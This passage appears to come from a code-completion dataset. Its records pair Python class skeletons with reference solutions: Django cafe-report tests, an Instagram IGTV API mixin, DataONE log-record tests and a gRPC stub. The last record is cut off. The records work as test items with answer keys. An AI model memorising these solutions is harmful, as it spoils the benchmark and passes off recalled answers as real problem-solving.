"ReportModelTest", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ReportModelTest:\n \"\"\"Report tests.\"\"\"\n\n def setUp(self):\n \"\"\"Data setup for tests.\"\"\"\n <|body_0|>\n\n def test_create(self):\n \"\"\"Check creating reports.\"\"\"\n <|body_1|>\n\n def test_doubles(self):\n \"\"\"Check if two fullproducts with same product are not allowed.\"\"\"\n <|body_2|>\n\n def test_report_validation(self):\n \"\"\"Check if Report model is properly validated.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.caffe = Caffe.objects.create(name='kafo', city='Gliwice', street='Wieczorka', house_number='14', postal_code='44-100')\n self.filtry = Caffe.objects.create(name='filtry', city='Warszawa', street='Filry', house_number='14', postal_code='44-100')\n self.user = Employee.objects.create_user(username='admin', password='admin', caffe=self.caffe)\n report1 = Report.objects.create(caffe=self.caffe)\n report2 = Report.objects.create(caffe=self.caffe)\n report3 = Report.objects.create(caffe=self.caffe)\n report4 = Report.objects.create(caffe=self.caffe)\n first_cat = Category.objects.create(name='first', caffe=self.caffe)\n second_cat = Category.objects.create(name='second', caffe=self.caffe)\n gram = Unit.objects.create(name='gram', caffe=self.caffe)\n liter = Unit.objects.create(name='liter', caffe=self.caffe)\n product1 = Product.objects.create(name='product1', category=first_cat, unit=gram, caffe=self.caffe)\n product2 = Product.objects.create(name='product2', category=first_cat, unit=liter, caffe=self.caffe)\n product3 = Product.objects.create(name='product3', category=second_cat, unit=gram, caffe=self.caffe)\n product4 = Product.objects.create(name='product4', category=second_cat, unit=liter, caffe=self.caffe)\n FullProduct.objects.create(product=product1, amount=10, report=report1, caffe=self.caffe)\n FullProduct.objects.create(product=product2, amount=100, report=report2, caffe=self.caffe)\n FullProduct.objects.create(product=product3, amount=0, report=report3, caffe=self.caffe)\n FullProduct.objects.create(product=product4, amount=1000, report=report4, caffe=self.caffe)\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertEqual(Report.objects.count(), 4)\n report = Report.objects.first()\n self.assertEqual(report.caffe, self.caffe)\n<|end_body_1|>\n\n<|body_start_2|>\n report1 = Report.objects.get(id=1)\n product = FullProduct.objects.first().product\n with self.assertRaises(Exception):\n FullProduct.objects.create(product=product, amount=1, report=report1)\n<|end_body_2|>\n\n<|body_start_3|>\n Report.objects.create(caffe=self.caffe, creator=self.user)\n with self.assertRaises(Exception):\n Report.objects.create(caffe=self.filtry, creator=self.user)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000382", "length_bytes": 14711, "license_type": "permissive", "methods": [{"docstring": "Data setup for tests.", "name": "setUp", "signature": "def setUp(self)"}, {"docstring": "Check creating reports.", "name": "test_create", "signature": "def test_create(self)"}, {"docstring": "Check if two fullproducts with same product are not allowed.", "name": "test_doubles", "signature": "def test_doubles(self)"}, {"docstring": "Check if Report model is properly validated.", "name": "test_report_validation", "signature": "def test_report_validation(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_005072", "prompt": "Implement the Python class `ReportModelTest` described below.\n\nClass description:\nReport tests.\n\nMethod signatures and docstrings:\n- def setUp(self): Data setup for tests.\n- def test_create(self): Check creating reports.\n- def test_doubles(self): Check if two fullproducts with same product are not allowed.\n- def test_report_validation(self): Check if Report model is properly validated.", "prompted_full_text": "Implement the Python class `ReportModelTest` described below.\n\nClass description:\nReport tests.\n\nMethod signatures and docstrings:\n- def setUp(self): Data setup for tests.\n- def test_create(self): Check creating reports.\n- def test_doubles(self): Check if two fullproducts with same product are not allowed.\n- def test_report_validation(self): Check if Report model is properly validated.\n\n<|skeleton|>\nclass ReportModelTest:\n \"\"\"Report tests.\"\"\"\n\n def setUp(self):\n \"\"\"Data setup for tests.\"\"\"\n <|body_0|>\n\n def test_create(self):\n \"\"\"Check creating reports.\"\"\"\n <|body_1|>\n\n def test_doubles(self):\n \"\"\"Check if two fullproducts with same product are not allowed.\"\"\"\n <|body_2|>\n\n def test_report_validation(self):\n \"\"\"Check if Report model is properly validated.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.caffe = Caffe.objects.create(name='kafo', city='Gliwice', street='Wieczorka', house_number='14', postal_code='44-100')\n self.filtry = Caffe.objects.create(name='filtry', city='Warszawa', street='Filry', house_number='14', postal_code='44-100')\n self.user = Employee.objects.create_user(username='admin', password='admin', caffe=self.caffe)\n report1 = Report.objects.create(caffe=self.caffe)\n report2 = Report.objects.create(caffe=self.caffe)\n report3 = Report.objects.create(caffe=self.caffe)\n report4 = Report.objects.create(caffe=self.caffe)\n first_cat = Category.objects.create(name='first', caffe=self.caffe)\n second_cat = Category.objects.create(name='second', caffe=self.caffe)\n gram = Unit.objects.create(name='gram', caffe=self.caffe)\n liter = Unit.objects.create(name='liter', caffe=self.caffe)\n product1 = Product.objects.create(name='product1', category=first_cat, unit=gram, caffe=self.caffe)\n product2 = Product.objects.create(name='product2', category=first_cat, unit=liter, caffe=self.caffe)\n product3 = Product.objects.create(name='product3', category=second_cat, unit=gram, caffe=self.caffe)\n product4 = Product.objects.create(name='product4', category=second_cat, unit=liter, caffe=self.caffe)\n FullProduct.objects.create(product=product1, amount=10, report=report1, caffe=self.caffe)\n FullProduct.objects.create(product=product2, amount=100, report=report2, caffe=self.caffe)\n FullProduct.objects.create(product=product3, amount=0, report=report3, caffe=self.caffe)\n FullProduct.objects.create(product=product4, amount=1000, report=report4, caffe=self.caffe)\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertEqual(Report.objects.count(), 4)\n report = Report.objects.first()\n self.assertEqual(report.caffe, self.caffe)\n<|end_body_1|>\n\n<|body_start_2|>\n report1 = Report.objects.get(id=1)\n product = FullProduct.objects.first().product\n with self.assertRaises(Exception):\n FullProduct.objects.create(product=product, amount=1, report=report1)\n<|end_body_2|>\n\n<|body_start_3|>\n Report.objects.create(caffe=self.caffe, creator=self.user)\n with self.assertRaises(Exception):\n Report.objects.create(caffe=self.filtry, creator=self.user)\n<|end_body_3|>\n", "revision_id": "cdb7f5edb29255c7e874eaa6231621063210a8b0", "skeleton": "<|skeleton|>\nclass ReportModelTest:\n \"\"\"Report tests.\"\"\"\n\n def setUp(self):\n \"\"\"Data setup for tests.\"\"\"\n <|body_0|>\n\n def test_create(self):\n \"\"\"Check creating reports.\"\"\"\n <|body_1|>\n\n def test_doubles(self):\n \"\"\"Check if two fullproducts with same product are not allowed.\"\"\"\n <|body_2|>\n\n def test_report_validation(self):\n \"\"\"Check if Report model is properly validated.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ReportModelTest:\n \"\"\"Report tests.\"\"\"\n\n def setUp(self):\n \"\"\"Data setup for tests.\"\"\"\n self.caffe = Caffe.objects.create(name='kafo', city='Gliwice', street='Wieczorka', house_number='14', postal_code='44-100')\n self.filtry = Caffe.objects.create(name='filtry', city='Warszawa', street='Filry', house_number='14', postal_code='44-100')\n self.user = Employee.objects.create_user(username='admin', password='admin', caffe=self.caffe)\n report1 = Report.objects.create(caffe=self.caffe)\n report2 = Report.objects.create(caffe=self.caffe)\n report3 = Report.objects.create(caffe=self.caffe)\n report4 = Report.objects.create(caffe=self.caffe)\n first_cat = Category.objects.create(name='first', caffe=self.caffe)\n second_cat = Category.objects.create(name='second', caffe=self.caffe)\n gram = Unit.objects.create(name='gram', caffe=self.caffe)\n liter = Unit.objects.create(name='liter', caffe=self.caffe)\n product1 = Product.objects.create(name='product1', category=first_cat, unit=gram, caffe=self.caffe)\n product2 = Product.objects.create(name='product2', category=first_cat, unit=liter, caffe=self.caffe)\n product3 = Product.objects.create(name='product3', category=second_cat, unit=gram, caffe=self.caffe)\n product4 = Product.objects.create(name='product4', category=second_cat, unit=liter, caffe=self.caffe)\n FullProduct.objects.create(product=product1, amount=10, report=report1, caffe=self.caffe)\n FullProduct.objects.create(product=product2, amount=100, report=report2, caffe=self.caffe)\n FullProduct.objects.create(product=product3, amount=0, report=report3, caffe=self.caffe)\n FullProduct.objects.create(product=product4, amount=1000, report=report4, caffe=self.caffe)\n\n def test_create(self):\n \"\"\"Check creating reports.\"\"\"\n self.assertEqual(Report.objects.count(), 4)\n report = Report.objects.first()\n self.assertEqual(report.caffe, self.caffe)\n\n def test_doubles(self):\n \"\"\"Check if two fullproducts with same product are not allowed.\"\"\"\n report1 = Report.objects.get(id=1)\n product = FullProduct.objects.first().product\n with self.assertRaises(Exception):\n FullProduct.objects.create(product=product, amount=1, report=report1)\n\n def test_report_validation(self):\n \"\"\"Check if Report model is properly validated.\"\"\"\n Report.objects.create(caffe=self.caffe, creator=self.user)\n with self.assertRaises(Exception):\n Report.objects.create(caffe=self.filtry, creator=self.user)\n", "source": "the_stack_v2_python_sparse", "source_path": "caffe/reports/test_models.py", "source_repo": "VirrageS/io-kawiarnie", "split": "test", "star_events_count": 3} {"blob_id": "ad4410bc547c6d96397c6b2ba724c9e107ca6759", "bodies": ["if channel_id not in ('for_you', 'chrono_following', 'popular', 'continue_watching') and (not re.match(USER_CHANNEL_ID_RE, channel_id)):\n raise ValueError('Invalid channel_id: {}'.format(channel_id))\nendpoint = 'igtv/channel/'\nparams = {'id': channel_id}\nparams.update(self.authenticated_params)\nif kwargs:\n params.update(kwargs)\nres = self._call_api(endpoint, params=params)\nif self.auto_patch:\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('items', [])]\nreturn res", "res = self._call_api('igtv/tv_guide/')\nif self.auto_patch:\n for c in res.get('channels', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in c.get('items', [])]\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('my_channel', {}).get('items', [])]\nreturn res", "text = text.strip()\nif not text.strip():\n raise ValueError('Search text cannot be empty')\nres = self._call_api('igtv/search/', query={'query': text})\nif self.auto_patch:\n for r in res.get('results', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in r.get('channel', {}).get('items', [])]\n if r.get('user'):\n ClientCompatPatch.user(r['user'], drop_incompat_keys=self.drop_incompat_keys)\nreturn res"], "bodies_text": "<|body_start_0|>\n if channel_id not in ('for_you', 'chrono_following', 'popular', 'continue_watching') and (not re.match(USER_CHANNEL_ID_RE, channel_id)):\n raise ValueError('Invalid channel_id: {}'.format(channel_id))\n endpoint = 'igtv/channel/'\n params = {'id': channel_id}\n params.update(self.authenticated_params)\n if kwargs:\n params.update(kwargs)\n res = self._call_api(endpoint, params=params)\n if self.auto_patch:\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('items', [])]\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n res = self._call_api('igtv/tv_guide/')\n if self.auto_patch:\n for c in res.get('channels', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in c.get('items', [])]\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('my_channel', {}).get('items', [])]\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n text = text.strip()\n if not text.strip():\n raise ValueError('Search text cannot be empty')\n res = self._call_api('igtv/search/', query={'query': text})\n if self.auto_patch:\n for r in res.get('results', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in r.get('channel', {}).get('items', [])]\n if r.get('user'):\n ClientCompatPatch.user(r['user'], drop_incompat_keys=self.drop_incompat_keys)\n return res\n<|end_body_2|>\n", "class_docstring": "For endpoints in ``/igtv/``.", "class_name": "IGTVEndpointsMixin", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass IGTVEndpointsMixin:\n \"\"\"For endpoints in ``/igtv/``.\"\"\"\n\n def tvchannel(self, channel_id, **kwargs):\n \"\"\"Get channel :param channel_id: One of 'for_you', 'chrono_following', 'popular', 'continue_watching' (as returned by :meth:`tvguide`) or for a user 'user_12345' where user_id = '12345'\"\"\"\n <|body_0|>\n\n def tvguide(self):\n \"\"\"TV guide to popular, following, suggested channels, etc\"\"\"\n <|body_1|>\n\n def search_igtv(self, text):\n \"\"\"Search igtv :param text: Search term\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if channel_id not in ('for_you', 'chrono_following', 'popular', 'continue_watching') and (not re.match(USER_CHANNEL_ID_RE, channel_id)):\n raise ValueError('Invalid channel_id: {}'.format(channel_id))\n endpoint = 'igtv/channel/'\n params = {'id': channel_id}\n params.update(self.authenticated_params)\n if kwargs:\n params.update(kwargs)\n res = self._call_api(endpoint, params=params)\n if self.auto_patch:\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('items', [])]\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n res = self._call_api('igtv/tv_guide/')\n if self.auto_patch:\n for c in res.get('channels', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in c.get('items', [])]\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('my_channel', {}).get('items', [])]\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n text = text.strip()\n if not text.strip():\n raise ValueError('Search text cannot be empty')\n res = self._call_api('igtv/search/', query={'query': text})\n if self.auto_patch:\n for r in res.get('results', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in r.get('channel', {}).get('items', [])]\n if r.get('user'):\n ClientCompatPatch.user(r['user'], drop_incompat_keys=self.drop_incompat_keys)\n return res\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000383", "length_bytes": 2289, "license_type": "permissive", "methods": [{"docstring": "Get channel :param channel_id: One of 'for_you', 'chrono_following', 'popular', 'continue_watching' (as returned by :meth:`tvguide`) or for a user 'user_12345' where user_id = '12345'", "name": "tvchannel", "signature": "def tvchannel(self, channel_id, **kwargs)"}, {"docstring": "TV guide to popular, following, suggested channels, etc", "name": "tvguide", "signature": "def tvguide(self)"}, {"docstring": "Search igtv :param text: Search term", "name": "search_igtv", "signature": "def search_igtv(self, text)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_001388", "prompt": "Implement the Python class `IGTVEndpointsMixin` described below.\n\nClass description:\nFor endpoints in ``/igtv/``.\n\nMethod signatures and docstrings:\n- def tvchannel(self, channel_id, **kwargs): Get channel :param channel_id: One of 'for_you', 'chrono_following', 'popular', 'continue_watching' (as returned by :meth:`tvguide`) or for a user 'user_12345' where user_id = '12345'\n- def tvguide(self): TV guide to popular, following, suggested channels, etc\n- def search_igtv(self, text): Search igtv :param text: Search term", "prompted_full_text": "Implement the Python class `IGTVEndpointsMixin` described below.\n\nClass description:\nFor endpoints in ``/igtv/``.\n\nMethod signatures and docstrings:\n- def tvchannel(self, channel_id, **kwargs): Get channel :param channel_id: One of 'for_you', 'chrono_following', 'popular', 'continue_watching' (as returned by :meth:`tvguide`) or for a user 'user_12345' where user_id = '12345'\n- def tvguide(self): TV guide to popular, following, suggested channels, etc\n- def search_igtv(self, text): Search igtv :param text: Search term\n\n<|skeleton|>\nclass IGTVEndpointsMixin:\n \"\"\"For endpoints in ``/igtv/``.\"\"\"\n\n def tvchannel(self, channel_id, **kwargs):\n \"\"\"Get channel :param channel_id: One of 'for_you', 'chrono_following', 'popular', 'continue_watching' (as returned by :meth:`tvguide`) or for a user 'user_12345' where user_id = '12345'\"\"\"\n <|body_0|>\n\n def tvguide(self):\n \"\"\"TV guide to popular, following, suggested channels, etc\"\"\"\n <|body_1|>\n\n def search_igtv(self, text):\n \"\"\"Search igtv :param text: Search term\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if channel_id not in ('for_you', 'chrono_following', 'popular', 'continue_watching') and (not re.match(USER_CHANNEL_ID_RE, channel_id)):\n raise ValueError('Invalid channel_id: {}'.format(channel_id))\n endpoint = 'igtv/channel/'\n params = {'id': channel_id}\n params.update(self.authenticated_params)\n if kwargs:\n params.update(kwargs)\n res = self._call_api(endpoint, params=params)\n if self.auto_patch:\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('items', [])]\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n res = self._call_api('igtv/tv_guide/')\n if self.auto_patch:\n for c in res.get('channels', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in c.get('items', [])]\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('my_channel', {}).get('items', [])]\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n text = text.strip()\n if not text.strip():\n raise ValueError('Search text cannot be empty')\n res = self._call_api('igtv/search/', query={'query': text})\n if self.auto_patch:\n for r in res.get('results', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in r.get('channel', {}).get('items', [])]\n if r.get('user'):\n ClientCompatPatch.user(r['user'], drop_incompat_keys=self.drop_incompat_keys)\n return res\n<|end_body_2|>\n", "revision_id": "7474bf00d2e97c73630713f3f0cec20a1b56b021", "skeleton": "<|skeleton|>\nclass IGTVEndpointsMixin:\n \"\"\"For endpoints in ``/igtv/``.\"\"\"\n\n def tvchannel(self, channel_id, **kwargs):\n \"\"\"Get channel :param channel_id: One of 'for_you', 'chrono_following', 'popular', 'continue_watching' (as returned by :meth:`tvguide`) or for a user 'user_12345' where user_id = '12345'\"\"\"\n <|body_0|>\n\n def tvguide(self):\n \"\"\"TV guide to popular, following, suggested channels, etc\"\"\"\n <|body_1|>\n\n def search_igtv(self, text):\n \"\"\"Search igtv :param text: Search term\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class IGTVEndpointsMixin:\n \"\"\"For endpoints in ``/igtv/``.\"\"\"\n\n def tvchannel(self, channel_id, **kwargs):\n \"\"\"Get channel :param channel_id: One of 'for_you', 'chrono_following', 'popular', 'continue_watching' (as returned by :meth:`tvguide`) or for a user 'user_12345' where user_id = '12345'\"\"\"\n if channel_id not in ('for_you', 'chrono_following', 'popular', 'continue_watching') and (not re.match(USER_CHANNEL_ID_RE, channel_id)):\n raise ValueError('Invalid channel_id: {}'.format(channel_id))\n endpoint = 'igtv/channel/'\n params = {'id': channel_id}\n params.update(self.authenticated_params)\n if kwargs:\n params.update(kwargs)\n res = self._call_api(endpoint, params=params)\n if self.auto_patch:\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('items', [])]\n return res\n\n def tvguide(self):\n \"\"\"TV guide to popular, following, suggested channels, etc\"\"\"\n res = self._call_api('igtv/tv_guide/')\n if self.auto_patch:\n for c in res.get('channels', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in c.get('items', [])]\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('my_channel', {}).get('items', [])]\n return res\n\n def search_igtv(self, text):\n \"\"\"Search igtv :param text: Search term\"\"\"\n text = text.strip()\n if not text.strip():\n raise ValueError('Search text cannot be empty')\n res = self._call_api('igtv/search/', query={'query': text})\n if self.auto_patch:\n for r in res.get('results', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in r.get('channel', {}).get('items', [])]\n if r.get('user'):\n ClientCompatPatch.user(r['user'], drop_incompat_keys=self.drop_incompat_keys)\n return res\n", "source": "the_stack_v2_python_sparse", "source_path": "instabotnet/api/instagram_private_api/endpoints/igtv.py", "source_repo": "remorses/instagram-botnet", "split": "test", "star_events_count": 7} {"blob_id": "4e7359131ee5b830ecc832ac28de4bbb34d8e130", "bodies": ["client = test_client.TestClient(context.node['baseurl'])\nlog_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1), event='create')\nassert log_records.total == context.object_total", "client = test_client.TestClient(context.node['baseurl'])\nlog_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1))\ncontext.log_records_total = log_records.total", "dates = []\nfor object_list in context.slices:\n for object_info in object_list.objectInfo:\n dates.append(object_info.dateSysMetadataModified)\nclient = test_client.TestClient(context.node['baseurl'])\nlogRecords = client.getLogRecords('', datetime.datetime(1800, 1, 1))\nassert len(logRecords.logEntry) == EVENTS_TOTAL\nfound = False\nfor o in logRecords.logEntry:\n if o.identifier.value() == 'hdl:10255/dryad.654/mets.xml' and o.event == 'create':\n found = True\n break\nassert found"], "bodies_text": "<|body_start_0|>\n client = test_client.TestClient(context.node['baseurl'])\n log_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1), event='create')\n assert log_records.total == context.object_total\n<|end_body_0|>\n\n<|body_start_1|>\n client = test_client.TestClient(context.node['baseurl'])\n log_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1))\n context.log_records_total = log_records.total\n<|end_body_1|>\n\n<|body_start_2|>\n dates = []\n for object_list in context.slices:\n for object_info in object_list.objectInfo:\n dates.append(object_info.dateSysMetadataModified)\n client = test_client.TestClient(context.node['baseurl'])\n logRecords = client.getLogRecords('', datetime.datetime(1800, 1, 1))\n assert len(logRecords.logEntry) == EVENTS_TOTAL\n found = False\n for o in logRecords.logEntry:\n if o.identifier.value() == 'hdl:10255/dryad.654/mets.xml' and o.event == 'create':\n found = True\n break\n assert found\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Test040GetLogRecords", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Test040GetLogRecords:\n\n def test_010_create_events(self):\n \"\"\"Event log contains the correct number of create events.\"\"\"\n <|body_0|>\n\n def test_020_get_total_events(self):\n \"\"\"Get total number of events.\"\"\"\n <|body_1|>\n\n def xevent_log_contains_create_events(self):\n \"\"\"Event log contains create events for all objects that are currently known. Timestamp slicing includes the correct object.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n client = test_client.TestClient(context.node['baseurl'])\n log_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1), event='create')\n assert log_records.total == context.object_total\n<|end_body_0|>\n\n<|body_start_1|>\n client = test_client.TestClient(context.node['baseurl'])\n log_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1))\n context.log_records_total = log_records.total\n<|end_body_1|>\n\n<|body_start_2|>\n dates = []\n for object_list in context.slices:\n for object_info in object_list.objectInfo:\n dates.append(object_info.dateSysMetadataModified)\n client = test_client.TestClient(context.node['baseurl'])\n logRecords = client.getLogRecords('', datetime.datetime(1800, 1, 1))\n assert len(logRecords.logEntry) == EVENTS_TOTAL\n found = False\n for o in logRecords.logEntry:\n if o.identifier.value() == 'hdl:10255/dryad.654/mets.xml' and o.event == 'create':\n found = True\n break\n assert found\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000384", "length_bytes": 2896, "license_type": "permissive", "methods": [{"docstring": "Event log contains the correct number of create events.", "name": "test_010_create_events", "signature": "def test_010_create_events(self)"}, {"docstring": "Get total number of events.", "name": "test_020_get_total_events", "signature": "def test_020_get_total_events(self)"}, {"docstring": "Event log contains create events for all objects that are currently known. Timestamp slicing includes the correct object.", "name": "xevent_log_contains_create_events", "signature": "def xevent_log_contains_create_events(self)"}], "n_methods": 3, "prompt": "Implement the Python class `Test040GetLogRecords` described below.\n\nClass description:\nImplement the Test040GetLogRecords class.\n\nMethod signatures and docstrings:\n- def test_010_create_events(self): Event log contains the correct number of create events.\n- def test_020_get_total_events(self): Get total number of events.\n- def xevent_log_contains_create_events(self): Event log contains create events for all objects that are currently known. Timestamp slicing includes the correct object.", "prompted_full_text": "Implement the Python class `Test040GetLogRecords` described below.\n\nClass description:\nImplement the Test040GetLogRecords class.\n\nMethod signatures and docstrings:\n- def test_010_create_events(self): Event log contains the correct number of create events.\n- def test_020_get_total_events(self): Get total number of events.\n- def xevent_log_contains_create_events(self): Event log contains create events for all objects that are currently known. Timestamp slicing includes the correct object.\n\n<|skeleton|>\nclass Test040GetLogRecords:\n\n def test_010_create_events(self):\n \"\"\"Event log contains the correct number of create events.\"\"\"\n <|body_0|>\n\n def test_020_get_total_events(self):\n \"\"\"Get total number of events.\"\"\"\n <|body_1|>\n\n def xevent_log_contains_create_events(self):\n \"\"\"Event log contains create events for all objects that are currently known. Timestamp slicing includes the correct object.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n client = test_client.TestClient(context.node['baseurl'])\n log_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1), event='create')\n assert log_records.total == context.object_total\n<|end_body_0|>\n\n<|body_start_1|>\n client = test_client.TestClient(context.node['baseurl'])\n log_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1))\n context.log_records_total = log_records.total\n<|end_body_1|>\n\n<|body_start_2|>\n dates = []\n for object_list in context.slices:\n for object_info in object_list.objectInfo:\n dates.append(object_info.dateSysMetadataModified)\n client = test_client.TestClient(context.node['baseurl'])\n logRecords = client.getLogRecords('', datetime.datetime(1800, 1, 1))\n assert len(logRecords.logEntry) == EVENTS_TOTAL\n found = False\n for o in logRecords.logEntry:\n if o.identifier.value() == 'hdl:10255/dryad.654/mets.xml' and o.event == 'create':\n found = True\n break\n assert found\n<|end_body_2|>\n", "revision_id": "d72a9461894d9be7d71178fb7310101b8ef9066a", "skeleton": "<|skeleton|>\nclass Test040GetLogRecords:\n\n def test_010_create_events(self):\n \"\"\"Event log contains the correct number of create events.\"\"\"\n <|body_0|>\n\n def test_020_get_total_events(self):\n \"\"\"Get total number of events.\"\"\"\n <|body_1|>\n\n def xevent_log_contains_create_events(self):\n \"\"\"Event log contains create events for all objects that are currently known. Timestamp slicing includes the correct object.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Test040GetLogRecords:\n def test_010_create_events(self):\n \"\"\"Event log contains the correct number of create events.\"\"\"\n client = test_client.TestClient(context.node['baseurl'])\n log_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1), event='create')\n assert log_records.total == context.object_total\n\n def test_020_get_total_events(self):\n \"\"\"Get total number of events.\"\"\"\n client = test_client.TestClient(context.node['baseurl'])\n log_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1))\n context.log_records_total = log_records.total\n\n def xevent_log_contains_create_events(self):\n \"\"\"Event log contains create events for all objects that are currently known. Timestamp slicing includes the correct object.\"\"\"\n dates = []\n for object_list in context.slices:\n for object_info in object_list.objectInfo:\n dates.append(object_info.dateSysMetadataModified)\n client = test_client.TestClient(context.node['baseurl'])\n logRecords = client.getLogRecords('', datetime.datetime(1800, 1, 1))\n assert len(logRecords.logEntry) == EVENTS_TOTAL\n found = False\n for o in logRecords.logEntry:\n if o.identifier.value() == 'hdl:10255/dryad.654/mets.xml' and o.event == 'create':\n found = True\n break\n assert found\n", "source": "the_stack_v2_python_sparse", "source_path": "test_utilities/src/d1_test/stress_tester/projects/_unit_test_bases_for_stress_tests/tier_1_mn_core_getlogrecords.py", "source_repo": "DataONEorg/d1_python", "split": "test", "star_events_count": 15} {"blob_id": "21bc04b65f9d76d593083e051f39dbbafd8eefee", "bodies": ["context.set_code(grpc.StatusCode.UNIMPLEMENTED)\ncontext.set_details('Method not implemented!')\nraise NotImplementedError('Method not implemented!')", "context.set_code(grpc.StatusCode.UNIMPLEMENTED)\ncontext.set_details('Method not implemented!')\nraise NotImplementedError('Method not implemented!')", "context.set_code(grpc.StatusCode.UNIMPLEMENTED)\ncontext.set_details('Method not implemented!')\nraise NotImplementedError('Method not implemented!')", "context.set_code(grpc.StatusCode.UNIMPLEMENTED)\ncontext.set_details('Method not implemented!')\nraise NotImplementedError('Method not implemented!')"], "bodies_text": "<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n\n<|body_start_2|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_2|>\n\n<|body_start_3|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_3|>\n", "class_docstring": "Missing associated documentation comment in .proto file.", "class_name": "AgentProfileServiceServicer", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AgentProfileServiceServicer:\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n\n def createAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_0|>\n\n def updateAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_1|>\n\n def deleteAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_2|>\n\n def getAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not 